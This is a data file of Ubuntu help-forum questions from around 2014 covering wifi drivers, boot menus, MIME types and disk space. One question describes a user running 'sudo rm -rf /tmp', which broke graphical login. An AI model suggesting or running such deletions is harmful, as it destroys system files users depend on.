424947	broadcom bcm4315 ca n't connect to my wifi network -- what to do ?	i own a dell inspiron 1525 with a broadcom corporation bcm4312 802.11b wireless controller . the problem is that wifi does not work well . i have tried many solutions proposed on the web , including installing restricted drivers , b43cutter , linux-nonfree-firware , bcwml-kernel-source and broadcom-sta-common . the only package that seems to make a difference is linux-nonfree-firware : without it the wireless is just dead ( led is off ) , with it my devices discovers many wireless networks , except the one in my house . i tried to connect manually by filling out the details but it did not work . this is happening with precise ( 12.04.4 lts ) . what should i do ? $ uname -mr 3.11.0-15-generic i686 $ lspci -vvnn | grep 14e4 0b:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) $ lsmod module size used by snd_hda_codec_idt 45116 1 snd_hda_codec_hdmi 40852 1 joydev 17329 0 uvcvideo 72275 0 snd_hda_intel 43326 3 snd_hda_codec 169534 3 snd_hda_codec_idt , snd_hda_codec_hdmi , snd_hda_intel i915 615640 3 snd_hwdep 13276 1 snd_hda_codec videobuf2_core 39385 1 uvcvideo snd_pcm 94597 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec videodev 107944 2 uvcvideo , videobuf2_core snd_seq_midi 13132 0 snd_rawmidi 25157 1 snd_seq_midi videobuf2_vmalloc 13048 1 uvcvideo snd_seq_midi_event 14475 1 snd_seq_midi drm_kms_helper 47306 1 i915 r852 17873 0 videobuf2_memops 13170 1 videobuf2_vmalloc sm_common 16772 1 r852 nand 59169 2 r852 , sm_common mtd 52875 2 sm_common , nand nand_ids 8547 1 nand snd_seq 55716 2 snd_seq_midi , snd_seq_midi_event nand_bch 13067 1 nand drm 247722 4 i915 , drm_kms_helper snd_timer 28930 2 snd_pcm , snd_seq snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq rfcomm 59026 0 bnep 19210 2 gpio_ich 13278 0 r592 17812 0 snd 61270 17 snd_hda_codec_idt , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_seq_midi , snd_rawmidi , snd_seq , snd_timer , snd_seq_device bch 21767 1 nand_bch dell_wmi 12665 0 sparse_keymap 13658 1 dell_wmi dell_laptop 17209 0 nand_ecc 13136 1 nand memstick 16051 1 r592 psmouse 92648 0 dcdbas 14456 1 dell_laptop lpc_ich 16987 0 i2c_algo_bit 13316 1 i915 serio_raw 13189 0 soundcore 12600 1 snd snd_page_alloc 18398 2 snd_hda_intel , snd_pcm mac_hid 13077 0 wmi 18744 1 dell_wmi video 19046 1 i915 bluetooth 341971 10 rfcomm , bnep parport_pc 32114 0 ppdev 17423 0 lp 13359 0 parport 40930 3 parport_pc , ppdev , lp firewire_ohci 36064 0 firewire_core 62303 1 firewire_ohci sdhci_pci 18588 0 ahci 25703 2 sdhci 37958 1 sdhci_pci crc_itu_t 12627 1 firewire_core libahci 30834 1 ahci sky2 53656 0
424949	searching window spread in ubuntu 13.10 ?	the super + w shortcut which `` window spreads '' will not let me search through windows . i tried messing with ccsm but still can not figure out what is wrong . ubuntu 13.10
424950	how to transfer photos from camera to pc over wi-fi ( canon s110 ) xubuntu 13.10	the canon s110 comes with an optical disk containing a software bundle for windows ( and of course nothing for linux ) , including an utility for connecting to the computer through wifi . also i think worth noting is that in windows the transfer process requires media streaming and network discovery to be turned on . i think this would be key points for enabling photo transfer on ubuntu also , but i can not find [ the equivalent of ] these options anywhere . this link explains the process for windows . so the question is how can i transfer my photos from the camera to my ubuntu pc over wireless ? i love the wireless option on the canon s110 and have been using it intensely before switching over to linux , i do n't like to mess with cables . anyway , i already lost the original cable . also my pc has no card reader . i am using both xubuntu and mint 16 xfce .
424951	how to install synaptics touchpad manager with terminal ?	i need to get this to get my touch-pad working but i am unable to install it with ubuntu software center as it says ` '' update error : require installation of untrusted packages ''
424956	disable memory cache - real reason	ok , before you mark my thread a duplicate i want to say , that i know this very good answer : how do i clean or disable the memory cache ? but this is not case for me . i am making some performance tests between in-memory application and disk-using application . so i want to have guarantee , that every time application tries to fetch something from disk , system really fetches this from disk , not from memory cache . ( i want to have performance factor , by how much worse application operates , when it has to read from disk . ) i know , that i can clean cache by sync & & echo 3 > /proc/sys/vm/drop_caches command , but cleaning every minute by cron is to slow for me , because cache is getting filled very quickly again . so i have a question : ca n't you really disable this feature ? or maybe go around it ? it really can mess up my tests results . ps : i am using ubuntu 12.04 64-bit .
424960	is there anyway to run aspx files in ubuntu 12.04 server	i bought a ubuntu server from digitalocean . therefore i can not run .aspx from my server in default . is there any way to run this command < % response.write ( `` hello , world ! '' ) % > with my ubuntu server . if i can please give me a full tutorial ... .
424961	why sudo passwd does n't work anymore ?	i installed eset , but it asked for the root password and i had not set one yet . so i went to the terminal typed in sudo passwd , set the password , and installed eset no problem . but now , like 10-15 later , when i tried to install the keys part of spotify preview and enter the same password as i did with eset it 's saying wrong password or incorrect password , or whatever ubuntu says when you type in the wrong sudo password . yes i 've tried my log in password . so i tried sudo passwd again , but same problem . that same password i set like 20-25 minutes now after typing all this will not work . i am running ubuntu 13.10 64bit . even though spotify is not crucial to my using of this computer , if i need to install something through the terminal for school , and ca n't , i 'm going to be mad . and if you are wondering why i installed eset and not a free antivirus for linux is because eset is good and i work with a lot of windows pc 's so i need to know i wo n't infect them . and i am not a novice at linux . i have used a combination of ubuntu 12.04 , 13.10 , linux mint 16 , and fedora 18 , 19 for a total of almost a year now . i have done a lot through the terminal and never ran into this problem . so as fast a correct response as possible would be nice .
424962	installing ubunutu in windows 8 laptop	i am using hp laptop with pre-installted windows 8 operating system . i have upgraded my windows 8 to windows 8.1 recently . my question is can i install ubunutu in my laptop . please replay and help me to find a soluton .
424963	unable to find a live medium containing a live file system	i met this problem ! how can i fix it ? cpu : intel pentium g620 ram : kingston ddr3 1333 4gb can anyone help ? i use wubi.exe to install have the same problem .
424968	ubuntu 12.04 belkin wireless not working	usually , when my wireless stops working after an upgrade , one or the other of the answers provided fixes it . not this time . please help . laptop - dell vostro 2520 uname -a linux jayadevan-vostro-2520 3.2.0-59-generic # 90-ubuntu smp tue jan 7 22:43:51 utc 2014 x86_64 x86_64 x86_64 gnu/linux i did the upgrade to 3.2.0-59 a few hours ago . what i feel are relevant lines from syslog 65115 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : scplugin-ifupdown : ( 32215856 ) ... get_connections ( managed=false ) : return empty list . 65116 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : keyfile : parsing bsnl*cellone new gprs*3g ... 65117 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : keyfile : read connection 'bsnl/cellone new gprs/3g' 65118 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : keyfile : parsing bsnl*cellone new gprs*3g-9e85869b-3233-4304-8b83-a00fd2f0acc4 ... 65119 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : keyfile : read connection 'bsnl/cellone new gprs/3g' 65120 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : keyfile : parsing belkin_g_wireless_084f3f ... 65121 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : keyfile : read connection 'belkin_g_wireless_084f3f' 65122 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : keyfile : parsing auto ethernet ... 65123 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : keyfile : read connection 'auto ethernet' 65124 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : ifupdown : get unmanaged devices count : 0 65125 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > modem-manager is now available 65126 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . 65127 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > wifi enabled by radio killswitch ; enabled by state file 65128 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > wwan enabled by radio killswitch ; enabled by state file 65129 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > wimax enabled by radio killswitch ; enabled by state file 65130 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > networking is enabled by state file 65131 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < warn > failed to allocate link cache : ( -10 ) operation not supported 65132 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > ( eth3 ) : carrier is off 65133 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > ( eth3 ) : new ethernet device ( driver : 'r8169 ' ifindex : 2 ) 65134 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > ( eth3 ) : exported as /org/freedesktop/networkmanager/devices/0 65135 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > ( eth3 ) : now managed 65136 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > ( eth3 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] 65137 feb 23 14:07:18 jayadevan-vostro-2520 networkmanager [ 978 ] : < info > ( eth3 ) : bringing up device . 65138 feb 23 14:07:18 jayadevan-vostro-2520 bluetoothd [ 674 ] : failed to init gatt_example plugin 65139 feb 23 14:07:18 jayadevan-vostro-2520 kernel : [ 13.587135 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 65140 feb 23 14:07:18 jayadevan-vostro-2520 kernel : [ 13.587138 ] bluetooth : bnep filters : protocol multicast 65141 feb 23 14:07:18 jayadevan-vostro-2520 kernel : [ 13.645720 ] mei : module is from the staging directory , the quality is unknown , you have been warned . any help will be appreciated .
424969	xoj ( xournal ) files handled as gzip despite presence of correct mime type	so i had to uninstall the ppa version of xournal and build from source ( with a modification ) . and now .xoj files open automatically with kde 's archive manager ark , and are identified as being of type `` gzip archive '' when one selects properties from the right-click menu in dolphin : ( before , .xoj files opened with xournal and were correctly identified . ) this state of affairs persists despite all of the following : 1 ) copied these files that come with the source package : - xournal.xml into /usr/share/mime/packages/ - xournal.desktop into /usr/share/applications/ - x-xoj.desktop into /usr/share/mimelnk/application/ 2 ) added the line application/x-xoj=xournal.desktop ; to ~/.local/share/applications/mimeapps.list 3 ) added the mime type application/x-xoj in the file associations system setting ( with appropriate content ) : ( note also that application/x-gzip specifies only the .gz extension : . ) 4 ) copied xournal.xml to /usr/share/mime/application as suggested here 5 ) sudo update-mime-database /usr/share/mime 6 ) restarted the computer edited to add : 7 ) [ right-click an .xoj file ] -- > open with -- > other ... -- > [ select 'xournal ' ] , tick 'remember application association for this type of file ' also has no effect . end of edit this is on kubuntu 12.04 . so , what am i missing ? edited to add i have discovered that the file -- mime-type [ filename ] and mimetype [ filename ] commands produce different results , as in this question : archelon @ ingelrayok : ~/documents/xournal $ file -- mime-type 2014-02-22-note-02-09.xoj 2014-02-22-note-02-09.xoj : application/x-gzip archelon @ ingelrayok : ~/documents/xournal $ mimetype 2014-02-22-note-02-09.xoj 2014-02-22-note-02-09.xoj : application/x-xoj however , there is no entry for application/x-gzip in /etc/mime.types ( from which the file command supposedly gets its information ) ; and , indeed , there should n't be , according to the comment at the beginning of that file , which reads in part : note : compression schemes like `` gzip '' , `` bzip '' , and `` compress '' are not actually `` mime-types '' . they are `` encodings '' and hence must not have entries in this file to map their extensions . the `` mime-type '' of an encoded file refers to the type of data that has been encoded , not the type of encoding . that comment also says that users can add their own types if they wish by creating a `` .mime.types '' file in their home directory . definitions included there will take precedence over those listed here . there is at present no such file . there are some files in my home directory ( which i did n't create ) that are apparently related to the output of the mimetype command ; these include ~/.local/share/mime/application/x-xoj.xml , ~/.local/share/mime/packages/application-x-xoj.xml , and ~/.local/share/mime/types which contains only the text application/x-xoj . in fact the directory ~/.local/share/mime/ and everything in it have the same timestamp ( 22:19 last night ) , and were thus presumably generated by the same process . after looking at the manpages for mimetype and file , i decided to check the environment variables $ xdg_data_home and $ xdg_data_dirs , which apparently are used by the former but not the latter . but i did n't know how to report the value of an environment variable , so i tried cat $ xdg_data_home , which set the value ( to nothing ) instead of reporting it . edited to add : or so i thought at first ; actually it was already unset , as we shall see . the correct command is echo $ xdg_data_home , as i learned from reading about environment variables here . so then i discovered that $ xdg_data_dirs was set to /usr/share/default : /usr/local/share/ : /usr/share/ ; the first of these does n't exist . i do n't think that matters , but anyway i ran the commands xdg_data_home= $ home/.local/share and xdg_data_dirs=/usr/local/share/ : /usr/share/ to accord with the standard . i doubt that any of this will make any difference , but i 'm going to try another restart now ( although i think those environment variables will be automatically reset anyway ) . next edit : yes , they were ; in fact the variable xdg_data_home is now null again . anyway the bottom line seems to be that kde is using the functionality that file is using , rather than that which mimetype is using . if i understand things correctly , this means that it is using magic instead of mime types . i now suspect that magic is responsible for this whole issue . new edit so the file manpage seems to be saying that these are the baseline magic files : /usr/share/misc/magic.mgc default compiled list of magic . /usr/share/misc/magic directory containing default magic files . ( i have these ; /usr/share/misc/magic is a link to the empty folder /usr/share/file/magic and /usr/share/misc/magic.mgc is a link to the file /usr/share/file/magic.mgc -- the latter is a 2.1 mb file full of gobbledygook ) and the following text : the information identifying these files ( i.e . `` files [ which ] have a `` magic number '' stored in a particular place near the beginning of the file '' ) is read from /etc/magic and the compiled magic file /usr/share/misc/magic.mgc , or the files in the directory /usr/share/misc/magic if the compiled file does not exist . in addition , if $ home/.magic.mgc or $ home/.magic exists , it will be used in preference to the system magic files . ( i have confirmed this with strace , as suggested here . ) neither $ home/.magic.mgc nor $ home/.magic exists on my system ; but , since presumably xoj files contain precisely that gobbledygook which causes a file to be magically identified as application/x-gzip , it would do no good to create them ( please correct me if i am wrong ) . the solution i 'm looking for , then , would be a way to have the mime-type specification override magic for a given file extension ; i thought i had seen something that looked like it might provide a hint as to how that might be accomplished , but i ca n't find it now . yet surely such a method exists .
424970	changing boot default to windows	after installing ubuntu , it automatically boots into linux when i start my computer . when i checked the boot order windows does not appear there . how do i add it or fix it so that windows boots first ?
424972	`` unsafe swap space detected '' during attempted lubuntu 13.10 install	i 'm a complete lubuntu/computer novice so bear with me . while trying to install lubuntu 13.10 onto an almost unused windows 7 starter asus eeepc 1015bx i got the message `` unsafe swap space detected '' as per the photo below : unsafe swap space detected i tried the suggestion in the link above , but i fear i 've done something wrong because when i now boot up , the screen goes black with a cursor flashing in top left hand corner . and being a novice , i 've not a clue what to do from there . any suggestions would be very much appreciated .
424973	unable to access a network external hdd	in my company there is an external hdd connected on the network when i try to open it it gives me `` unable to access location , unknown error code -5004 from server '' however the external hdd is appearing on the browse network tap , iâm using ubuntu 13.10 .
424974	stuck at purple screen	whenever my computer turns off while booting due to a power failure , i get a purple screen with boot options when i on it once again.the problem is i am stuck in this screen forever and nothing i do has any effect.this is annoying because the only solution i have for this is re installation.and i lose all data i saved till now .
424975	how find a linux kernel supported wireless card ?	background : i have used ubuntu 12.04 lts for more than one year . i have tried several times to install driver on rtl8192 because it does not work , but without success . qustion : how can i find a linux-kernel supported wireless card suitable to thinkpad sl410k .
424978	list of installed programs without dependencies	i would like to have a list of the programs that i have installed via usc or terminal but without the their dependencies . is it possible ? if yes in which mode ? i use ubuntu 13.10 thank you
424979	comic reader that supports animated .gif images ?	short and simple question -- is there a comic viewer that will allow me to view my .cb7 comic files with animation ? there are some comics and manga i have that have animated .gif images that move -- in windows i was able to open and display these using honeyview . is there any similar program for linux ? right now i have decompress the archives in order to view the animations ...
424981	umount dev/sda1 to mount dev/sda1 or change partition to ntfs	well i installed ubuntu but i ca n't play many games i would like too and i ca n't change to ntfs with gparted because i 'm using /dev/sda1 and i would like to know if its possible to change with commands at cmds but only using one pen drive thanks : )
424983	how to configure sound in my dell xpsl502x	how to configure sound for my dell xpsl502x to work subwoofer and speaker .my alsa information is onlink `` http : //www.alsa-project.org/db/ ? f=c5365ed0a2242c8846944dd90e8c90a66b59b9c0 ''
424984	black screen when try to run `` optirun glxspheres64 ''	i 've already install bumblebee and primus for my lenovo g580 with nvidia 635m . glxspheres64 runs properly ; optirun glxspheres64 shows only black screen and i received this error in terminal : joe @ g580 : ~ $ optirun glxspheres64 polygons in scene : 62464 xlib : extension `` glx '' missing on display `` :8 '' . error ( 603 ) : could not obtain rgb visual with requested properties any suggestions ? i 've tried to reinstall driver couple times with different guides but it is still the same ...
424985	upgrade ubuntu space with windows 7	i installed ubuntu beside windows 7 and after 6 months from use it i love it and i need to delete windows 7 space and move it to ubuntu . for example : partition c had tow systems : 1- widows 7 30 gb 2- ubuntu 20 gb so i need to upgrade ubuntu space to be 50 gb and delete widows 7 is it possible and how to do that ? screen shot :
424986	usb drive spin down	i have 2 usb hdd drives connected to my notebook with ubuntu 14.04 , each of them spin down after ~10minutes . i need to make them always in active mode ( no spin down ) . i tried sdparm and hd-idle , but no results . ( maybe wrong config ? ) . proper command in sdparm and hd-idle ( sdparm -- command=stop and hd-idle -t ) correctly spin down both drives . in hd-idle ( /etc/default/hd-idle ) i have : start_hd_idle=true hd_idle_opts= '' -a /dev/disk/by-uuid/66041c7c13555a92 -i 43200 -a /dev/disk/by-uuid/9a7c2a8d7c2a63eb -i 43200 -l /var/log/hd-idle.log '' thanks for any help .
424987	grub menu entry that boot in two diffrent ubuntu	i have used clonezilla to clone my ubuntu partition into another partition . now on my grub menu i have two ubuntu , one named ubuntu and anoother ubuntu 13.10 . my problem is that when enter to the second , sometime is the cloned partition and sometime is the non cloned one . i have noticed that it happens when i restart from the non cloned one . someone could explain why it happens ? thanks .
424990	uninstalling broken ubuntu 12.04 -- weird scenario	i installed ubuntu 12.04 lts after my win 8.1 pro preview license expired . ( using wubi -- other route was n't working , before you tell me that wubi + win8 x ( ) 2 things happened which i neither desired , nor expected : 1 ) i installed it in dual-boot mode 2 ) both windows and linux were on the same partition ( there was more than 1 partition ) after several driver issues which i could n't fix , ubuntu stopped working . i wish to uninstall it through windows , and preferably without formatting the common partition . is this possible ? ? thanking you , a
424991	something used up my disk , do n't know what	welcome to ubuntu 12.04.4 lts ( gnu/linux 3.2.0-58-virtual x86_64 ) * documentation : https : //help.ubuntu.com/ system information as of sun feb 23 10:40:22 utc 2014 system load : 0.03 processes : 147 usage of / : 100.0 % of 9.84gb users logged in : 0 memory usage : 43 % ip address for virbr0 : 192.168.122.1 swap usage : 0 % ip address for br100 : 10.0.0.1 = > / is using 100.0 % of 9.84gb graph this data and manage this system at : https : //landscape.canonical.com/ get cloud support with ubuntu advantage cloud guest : http : //www.ubuntu.com/business/services/cloud use juju to deploy your cloud instances and workloads : https : //juju.ubuntu.com/ # cloud-precise last login : sun feb 23 10:35:47 2014 from act-portal1.gw.csiro.au ubuntu @ openstack : ~ $ du -sk * | sort -nr154496 openstack-manuals148300 identity-api 129208 object-api 52232 devstack 34480 volume-api 32724 api-site 7952 compute-api 5344 netconn-api 1120 python-swiftclient 32 sh ubuntu @ openstack : ~ $ sudo rm -r python-swiftclient/ ubuntu @ openstack : ~ $ du -sk * | sort -nr 154496 openstack-manuals 148300 identity-api 129208 object-api 52232 devstack 34480 volume-api 32724 api-site 7952 compute-api 5344 netconn-api 32 sh ubuntu @ openstack : ~ $ df -h filesystem size used avail use % mounted on /dev/vda1 9.9g 9.9g 0 100 % / udev 2.0g 8.0k 2.0g 1 % /dev tmpfs 792m 252k 791m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 0 2.0g 0 % /run/shm cgroup 2.0g 0 2.0g 0 % /sys/fs/cgroup /dev/vdb 30g 173m 28g 1 % /mnt ubuntu @ openstack : ~ $ du -sch . [ ! . ] * * |sort -h 0 .sudo_as_admin_successful 4.0k .bash_logout 4.0k .bashrc 4.0k .cache 4.0k .gitconfig 4.0k .my.cnf 4.0k .profile 4.0k .rnd 4.0k .viminfo 8.0k .cinderclient 8.0k .distlib 8.0k .fop 20k .ssh 28k .novaclient 32k sh 108k .pip 280k .bash_history 5.3m netconn-api 7.8m compute-api 32m api-site 34m volume-api 52m devstack 107m .m2 127m object-api 145m identity-api 151m openstack-manuals 659m total keep getting fatal : can not create directory at 'bla-bla ' : no space left on device restart did n't solve it . user251046 's method : root @ openstack : ~ # apt-get clean -y & & apt-get autoremove -y e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . ubuntu @ openstack : ~ $ sudo dpkg -- configure -a setting up localepurge ( 0.6.2+nmu2 ) ... creating config file /etc/locale.nopurge with new version ubuntu @ openstack : ~ $ sudo su root @ openstack : /home/ubuntu # apt-get clean -y & & apt-get autoremove -y reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . root @ openstack : /home/ubuntu # df -h filesystem size used avail use % mounted on /dev/vda1 9.9g 9.8g 0 100 % / root @ openstack : ~ # apt-get install deborphan reading package lists ... done building dependency tree reading state information ... done deborphan is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . root @ openstack : ~ # deborphan root @ openstack : ~ # nothing in tmp root @ openstack : /home/ubuntu # cd /tmp root @ openstack : /tmp # ls filekempud filettvnyd root @ openstack : /tmp # rm * root @ openstack : /tmp # ls -l total 0 root @ openstack : /tmp # cd root @ openstack : ~ # df -h filesystem size used avail use % mounted on /dev/vda1 9.9g 9.8g 0 100 % / root @ openstack : ~ # exit exit ubuntu @ openstack : ~ $ du -sch . [ ! . ] * * |sort -h 0 .sudo_as_admin_successful 4.0k .bash_logout 4.0k .bashrc 4.0k .cache 4.0k .gitconfig 4.0k .my.cnf 4.0k .profile 4.0k .rnd 4.0k .viminfo 8.0k .cinderclient 8.0k .distlib 8.0k .fop 20k .ssh 28k .novaclient 32k sh 108k .pip 284k .bash_history 5.3m netconn-api 7.8m compute-api 32m api-site 34m volume-api 52m devstack 107m .m2 127m object-api 145m identity-api 151m openstack-manuals 659m total
424992	toshiba p50 ax3111 series laptop webcam not responding on ubuntu 13.04	i am running ubuntu 13.04 on vmware platform . the webcam is not being detected . tried taking pics from cheese photobooth . only a black screen appears . please help
424995	ubuntu crash after bios battery changed	i am trying to repair a jvc netbook for a friend of mine . the problem initially was a bios battery problem which i fixed with a battery change ( cr2032 old battery voltage was 0.15v and new one is 3.3 v ) . after this i booted up the machine and i get the grub menu . i am a noob with linux stuff but tried any way to figure out whats happening . so on selecting the ubuntu default ( lubutnu distro ) the machine freezes . i then check the other options for booting and get the detailed picture and notice that i get the kernel_thread_helper+0x6/0x10 error with a hex dump and the info stating that my cpu is stalling . this makes me think that it a cpu hardware problem but not sure . i tried 2 things after this after reading several forums with respect to the kernel_thread_helper error shown below . usb re install . this is a pain as the bios shows a usb boot selection but it never boots up . on forums it was suggested to try to boot thru grub but then i can never find the root command or the find command at the grub prompt ( after hitting key `` c '' on the grub option screen ) . i do n't know where to go from here . change the acpi setting to off on the linux line in the grub startup ( after hitting key `` e '' on the grub option screen ) according to http : //ubuntuforums.org/showthread.php ? t=1591381 & p=9943683 # post9943683 . i hit ctrl-x and was then able to get to the prompt ( here is where i find it is a lubuntu distro as the prompt tells me that ) . i tried running startx or lxde but they show up as errors . do i need to login ? or any other ideas ?
424997	disk partitioning showing wrongly when installing ubuntu alongside windows 8	currently my system has windows 8 pro . i want to install ubuntu alongside windows . i have ubuntu 13.04,13.10 and 10.10 disks . whenever i try to install ubuntu there are two problems : when i reach the page to select the partition , the partitions are showing wrongly . actually i have 3 partitions on my hard disk . but the installation process is showing only two . c : drive is shown properly . d : and e : drive are shown in combination as a single partition . besides these are 100mb and 1mb partitions are also shown . here , am confused . i do n't know what to do here . i also tried the install alongside option , but it is getting stopped due to some error like : stopped by signal 15 . how can i solve these problems ?
424999	ubuntu fails to boot from external hdd	i have a busted internal hdd . so , i got my new 1 tb hdd . i 've partitioned this 1 tb hdd into a 200 gb and the remaining has my data . my computer does n't support uefi . i 've installed ubuntu 12.04 64-bit on the 200 gb partition with ext4 file system on / . the bootloader is on the external hard disk drive , not the partition . so , when i try to boot , i get a black screen . i pressed shift , it says that there 's a grub rescue issue and lets me type anything . what to do ?
425002	console does n't show pretty utf-8 characters in shell	i want to write some pretty , special characters taken from web in my shell console with echo command . i want to write , for example , ▲ character , but it shows me ��� character . how can i solve the problem ? thanks ! note : when i run locale command , it shows these : locale : can not set lc_all to default locale : no such file or directory lang=en_us.utf-8 language=en lc_ctype= '' en_us.utf-8 '' lc_numeric=en_us.utf-8 lc_time=az_az.utf-8 lc_collate= '' en_us.utf-8 '' lc_monetary=az_az.utf-8 lc_messages= '' en_us.utf-8 '' lc_paper=az_az.utf-8 lc_name=en_us.utf-8 lc_address=az_az.utf-8 lc_telephone=az_az.utf-8 lc_measurement=az_az.utf-8 lc_identification=en_us.utf-8 lc_all=
425003	ca n't login anymore	in an attempt to free up disk space as i was 100 % full and could not write to the disk anymore i ran sudo rm -rf /tmp seems like that was a rather stupid thing to do as i can not login into my machine via the gui . i can log in though when pressing ctrl , alt and f1 and access everything via the command line . how do i go about fixing this ? help appreciated
425005	parcellite indicator in ubuntu 13.10	i 've been happily using parcellite clipboard manager for some time now . but after upgrading from ubuntu 13.04 to 13.10 , which also meant upgrading parcellite from 1.1.4 to 1.1.5 , i no longer have parcellite unity panel indicator . any suggestions ?
425009	how to add a proxy settings to gem	does ubuntu have default proxy settings ? i ask this question because every time i try to install rails through gem install rails i get connection timed out error ! this error occurs even i try from live cd ! so i am in doubt if ubuntu has some default proxy settings .
425010	screen stuck with ubuntu 12.04 on dell optiplex 7010 with biolinux	the screen stops working after a while on my dell machine ( optiplex 7010 ) i 'm using biolinux ( ubuntu 12.04 ) , it first was hard to install 12.04 as after the installation loading the screen went red and green blocks but after restarting the installation many times it works , after installing the operating system the screen stuck after launching any program and i do n't know what to do ! ! ! !
425013	how can i make rygel 's playbin ( upnp/dlna renderer/player ) always show up full screen ?	i started to use rygel on ubuntu 13.10 , and the playbin plugin of rygel . however when i make playbin show a video , or an image , a window shows up , but with the original size of the medium , unmaximised . my desired behaviour is to show up full screen . how can this be achieved ?
425015	ubuntu for dell inspiron 1545 ( celeron dual-core cpu 1.80 ghz )	i installed ubuntu ( 12.04 lts ) on my acer inspire one laptop with out any major problems . now i want to install it on my dell inspiron laptop , but the only versions i could find were 64bit for 2.xx ghz cpus . i 've checked various forums , but all the posts are ( understandably from 3+ years ago . the most relevant reference i could find was about ubuntu 9.04 . thanks for any help .
425016	overheating problem with hp pavilion g6 2231tx	i have overheating problem with hp pavilion g6 on ubuntu , but i do n't have any issues on windows 8 . my cpu is intel i3 , 2.4 ghz .
425017	fan velocity at maximum	i have an hp 620 and i 've just installed ubuntu 12.04 with wubi . the problem is that after a suspension the fan runs at maximum . how can i fix that problem ?
425018	log out problem after upgrading from 13.04 to 13.10	after i 've upgraded from ubuntu 13.04 to 13.10 , i can no longer use the session indicator `` log out ... '' menu . as soon as i click on it , the screen goes blank with no mouse or keyboard input , so i can not do anything other then pressing and holding the power button down to force the computer to shut down . the same also happens if i enter the terminal command sudo service lightdm restart . i can switch to guest session but then i have the same problem again when i switch back to my user session , the only difference : the screen is not black but simply my regular desktop screen is frozen . any ideas that can help me out will be much appreciated .
425020	suspend on lid close , even with the option off	i 've set up a friends laptop with ubuntu 12.04lts with the cinnamon desktop , and i 'm having a few issues with the power settings . as far as i can tell i 've got every setting to `` do nothing '' when the lid is closed , however it still suspends when i close the lid . after much googling i 'm still no closer to a solution , so i came here for help .
425025	how to get ubuntu news ?	other that omg ! ubuntu and the official ubuntu site , are there any other ways or websites where we can get updates , news , etc about ubuntu and its products ? one way/website per answer would be nice .
425027	how to recover password from ubuntu installed on sd card ?	i 've got my ubuntu 13.04 arm installed on the sd card . system was working on beaglebone black . the image was installed following instructions in this wiki page : http : //elinux.org/beagleboardubuntu # method_1 : _download_a_complete_pre-configured_image . well , system did boot automatically after inserting , everything worked pretty well . now the main issue - i have changed the default password ( `` temppwd '' ) and forgot the new one ( after changing password i did n't use the system for quite a while ) . # sic ! now i 'm wondering what can i do to get my system back for good . the conventional ways of recovering password described so widely here and on the other forums do n't work in this case , because : 1 ) the system is on the sd card 2 ) i do n't have grub installed on the beaglebone black . so now i have got two systems . one is running on the internal emmc card of the bbb , which is working correctly and i know the password to it , so i can normally boot the system ( ubuntu 13.04 ) . the other one is on the sd card and i lost the password to it ( ubuntu 13.04 aswell ) . when i try to put the sd card into the bbb after booting the onboard system ( so , that it would n't try to boot from sd card ) , i can not mount the sd card then : mount : ca n't find /dev/mmcblk0 in /etc/fstab or /etc/mtab what can i do to recover my system ? regards rogi
425030	how can i determine which installed fonts can display a certain glyph ?	given a glyph ( eg : '' ) , how do i determine which ( if any ! ) fonts contain it ? that particular glyph displays in firefox , so presumably it 's on my system , but i 've not been able to get it displayed in a python-generated pdf .
425036	accessing at home windows network drive	i 'm very new to ubuntu so i 'm still very much stumbling around . in the file drawer i can see an icon for my network drive but i cant figure out where i enter or store the user id and password that this network drive has on it . the network drive is a windows based device thanks in advance .
425041	virtual memory or swap memory on ubuntu installed by wubi installer	i am using ubuntu 32 bit which i have installed inside windows 7 with wubi installer . i have noted that my ubuntu swap memory is only 256mb and my ram is 2gb . i have tried my best to gain swap memory using flash drive with gparted software , but i ca n't get it to work . if anyone has a workable solution for my problem that would be great .
